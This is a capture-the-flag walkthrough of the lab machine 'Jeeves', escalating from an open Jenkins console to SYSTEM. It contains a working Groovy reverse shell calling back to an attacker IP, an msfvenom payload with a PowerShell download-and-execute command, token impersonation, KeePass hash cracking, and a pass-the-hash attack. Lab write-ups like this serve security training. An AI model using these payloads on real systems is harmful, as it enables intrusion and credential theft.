Today we’re going to solve another CTF machine, “Jeeves”. It is now a retired box and is accessible to VIP members.

Specifications

  • Target OS: Windows
  • IP Address: 10.10.10.63
  • Difficulty: Medium

Contents

  • Getting user
  • Getting root

Enumeration

As always, the first step is reconnaissance, starting with a port scan.

Ports Scanning

During this step we identify what is listening behind the IP address. Scanning the full port range matters here, because the interesting service is on a high port that a default top-1000 scan would miss.

nmap -p 1-65535 -T4 -A -v 10.10.10.63

Enumerating Port 80

Nmap reveals Microsoft IIS httpd 10.0 on port 80, serving a search page styled after Ask Jeeves.

The page source references an error.html page, which contains nothing but an image, jeeves.PNG.

The image reveals some information that might help with exploitation or privilege escalation on the box, so note it for later.

Enumerating Port 50000

Nmap identifies port 50000 as a Jetty web server. Browsing to http://10.10.10.63:50000 does not show an application at the root, so something must be hiding under a sub-path.

Let’s run DirBuster to see if there’s anything hidden.

It finds /askjeeves, which turns out to be a Jenkins instance, so let’s take a look at it.

Exploitation

Searching for Jenkins exploits shows that the Jenkins script console lets anyone who can reach it run arbitrary Groovy on the Jenkins master, including OS commands through Java’s ProcessBuilder. This instance has no authentication in front of it, so the script console is a direct code-execution path.

Reverse Shell: https://alionder.net/jenkins-script-console-code-exec-reverse-shell-java-deserialization

Manage Jenkins > Script Console

Reverse Shell

// Groovy auto-imports java.net.* and java.io.*, so Socket and the stream classes need no import.
String host = "10.10.14.27";   // attacker IP
int port = 1337;               // listener port
String cmd = "cmd.exe";        // shell to spawn on the Windows target

// Spawn the shell, connect back, and pump bytes between the process and the socket
// until the socket closes or the shell exits.
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();

Start a listener on port 1337 on the attacking machine first, then click Run; the shell connects back to it.

This gives us a low-privilege shell as the account Jenkins runs under, so let’s upgrade it to a Meterpreter session.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1338 -f exe > shell.exe

Serve shell.exe from the attacking machine over HTTP and pull it onto the target with PowerShell, then start a matching handler (exploit/multi/handler with the same payload, LHOST and LPORT) before executing it.

powershell "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.27:8000/shell.exe', 'shell.exe')"

After running the PowerShell download and executing shell.exe we get a Meterpreter session.

We can find user.txt under C:\Users\kohsuke\Desktop

Privilege Escalation

Method 1

We start by gathering basic information about the target, so let’s run systeminfo first.

Copy its output into a local file named systeminfo.txt. Now we’re going to run Windows Exploit Suggester against it.

python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2019-08-01-mssb.xls --systeminfo systeminfo.txt

The suggester flags MS16-075, which maps to the RottenPotato token-impersonation technique:
https://github.com/foxglovesec/RottenPotato

Abusing Token Privileges For Windows Local Privilege Escalation

https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation

RottenPotato needs SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) on the current account, which the account running Jenkins holds here; check the output of whoami /priv before trying it. With Meterpreter’s incognito extension loaded, list_tokens -u initially shows no impersonation tokens available. Run RottenPotato.exe on the target, then list the tokens again.

There you go!

impersonate_token "NT AUTHORITY\\SYSTEM"

And we’re NT AUTHORITY\SYSTEM.

Method 2

There’s a file named CEH.kdbx under C:\Users\kohsuke\Documents.

After downloading it, check the file type with the file utility.

It reports a KeePass password database (KDBX version 2).

Open KeePass file.

keepassx CEH.kdbx

This file is protected with a password but we know how to get it 🙂

Kali ships keepass2john, which extracts a crackable hash from the database header.

keepass2john CEH.kdbx > key

CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

Let’s crack the hash with rockyou.

Cracking the Hash Using John

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt key

Password: moonshine1

Let’s open the KeePass file with the recovered master password.

The database holds a handful of entries. Checking each one, the entry titled Backup Stuff is the interesting one: instead of a password it contains an LM:NT hash pair.

NTLM Hash: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

The LM half (aad3b435b51404eeaad3b435b51404ee) is the well-known hash of an empty LM password, so only the NT half carries anything. Here’s the remaining content of the KeePass file.

Password
12345
F7WhTrSFDKB6sxHU1cUn
pwndyouall!
lCEUnYPjNfIuPZSzOySA
S1TjAtJHKsugh9oC4VZl
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

SMB is exposed on the target, so we can try these against the Administrator account in two ways: a password spray with the cleartext entries, and a pass-the-hash attempt with the NT hash (passwords.txt holds the cleartext entries, hash.txt the LM:NT pair).

crackmapexec smb 10.10.10.63 -u Administrator -p passwords.txt --lusers
crackmapexec smb 10.10.10.63 -u Administrator -H hash.txt --lusers
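Before spraying, it is worth knowing what the hash actually is and whether one of the cleartext entries already corresponds to it. The script below is an added example, not part of the original write-up: it implements MD4 in pure Python (hashlib’s md4 is often disabled on current OpenSSL builds), computes NT hashes as MD4 over the UTF-16LE password, splits the LM:NT pair, flags the empty-LM marker, and checks the KeePass passwords from the page against the NT hash. The candidate list is copied from the page; whatever match_nt returns for it is the result, nothing is assumed about it.

```python
"""NT-hash helpers for the Backup Stuff entry (added example, pure Python)."""
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password
MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_block(state, block):
    """One 512-bit MD4 compression (RFC 1320), registers rotated each step."""
    X = struct.unpack("<16I", block)
    a, b, c, d = state
    for i in range(16):                      # round 1: F = (x & y) | (~x & z)
        f = (b & c) | (~b & MASK & d)
        a = _rotl((a + f + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
        a, b, c, d = d, a, b, c
    for i in range(16):                      # round 2: G = majority(x, y, z)
        g = (b & c) | (b & d) | (c & d)
        k = (i % 4) * 4 + i // 4             # 0,4,8,12,1,5,9,13,...
        a = _rotl((a + g + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
        a, b, c, d = d, a, b, c
    for i in range(16):                      # round 3: H = x ^ y ^ z
        h = b ^ c ^ d
        k = (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]   # 0,8,4,12,2,10,...
        a = _rotl((a + h + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
        a, b, c, d = d, a, b, c
    return [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]


def md4(data: bytes) -> bytes:
    msg = bytearray(data) + b"\x80"          # pad: 0x80, zeros, 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        state = _md4_block(state, msg[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), lower-case hex."""
    return md4(password.encode("utf-16-le")).hex()


def split_ntlm(pair: str):
    """'LM:NT' as dumped by secretsdump/mimikatz -> (lm, nt), both lower-case."""
    lm, nt = pair.strip().lower().split(":")
    if len(lm) != 32 or len(nt) != 32:
        raise ValueError("expected LM:NT with 32 hex chars each")
    return lm, nt


def lm_is_empty(lm: str) -> bool:
    """True when the LM half is the empty-password hash (LM storage disabled)."""
    return lm.lower() == EMPTY_LM


def match_nt(nt: str, candidates):
    """Return the candidate whose NT hash equals nt, or None if none does."""
    for pw in candidates:
        if nt_hash(pw) == nt.lower():
            return pw
    return None


# Values copied from the KeePass database described on the page.
BACKUP_STUFF = "aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00"
KEEPASS_PASSWORDS = ["12345", "F7WhTrSFDKB6sxHU1cUn", "pwndyouall!",
                     "lCEUnYPjNfIuPZSzOySA", "S1TjAtJHKsugh9oC4VZl"]

if __name__ == "__main__":
    lm, nt = split_ntlm(BACKUP_STUFF)
    print("LM half is the empty-LM marker:", lm_is_empty(lm))
    print("NT hash matches a KeePass password:", match_nt(nt, KEEPASS_PASSWORDS))
```

If match_nt returns a password, the spray alone would have worked; if it returns None, the hash is the only credential for that account and pass-the-hash is the route, which is what the crackmapexec -H line and the psexec module below rely on. Either way the NT half is all that is needed: SMB NTLM authentication never uses the LM half when it is the empty marker.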

Metasploit PSEXEC Module

Module: exploit/windows/smb/psexec

The module accepts an LM:NT hash in SMBPass, so set SMBUser to Administrator, SMBPass to the hash from the KeePass entry and RHOSTS to the target, then run it.

And we’re NT AUTHORITY\SYSTEM.

Now let’s look for the flag.

dir /a lists hidden files, and dir /R lists the alternate data streams (ADS) attached to each file, which a plain dir never shows.

The entry hm.txt:root.txt:$DATA means root.txt is stored as a named stream attached to hm.txt; reading hm.txt itself only returns its default (unnamed) stream, which is why the flag was not visible at first.

cmd’s type does not accept the stream syntax directly, so read it through input redirection: more < hm.txt:root.txt:$DATA
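When a box hides data this way there is rarely only one stream, so it pays to pull every ADS out of a dir /R listing rather than eyeballing it. The parser below is an added example, not part of the original write-up; the listing it runs on is a constructed stand-in for the Administrator desktop (dates and sizes invented), and it also copes with the thousands separators dir prints for larger sizes.

```python
"""Extract alternate data streams from `dir /R` output (added example)."""
import re

# Constructed sample of what `dir /R` prints; the stream line has no date and
# the name carries the file:stream:$DATA form described in the write-up.
SAMPLE_DIR_R = """\
 Directory of C:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/03/2017  11:03 PM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/03/2017  11:03 PM             1,234 Windows 10 Update Assistant.lnk
"""

# Leading whitespace (no date column), size (may contain ','), then name:stream:$DATA.
_STREAM = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:]+):\$DATA\s*$")


def find_streams(listing: str):
    """Return [(host_file, stream_name, size_bytes)] for every named stream.
    The default unnamed stream is the ordinary file line and is not reported."""
    found = []
    for line in listing.splitlines():
        m = _STREAM.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            found.append((m.group(2), m.group(3), size))
    return found


if __name__ == "__main__":
    for host, stream, size in find_streams(SAMPLE_DIR_R):
        print(f"{host} carries stream '{stream}' ({size} bytes); "
              f"read it with: more < {host}:{stream}:$DATA")
```

The regex keys on the missing date column, which is how dir /R distinguishes a stream line from its host file; the unnamed stream of every file is the normal line above it, so only named streams come back. On the PowerShell side the equivalent check is Get-Item with -Stream *, which lists named streams without the text parsing.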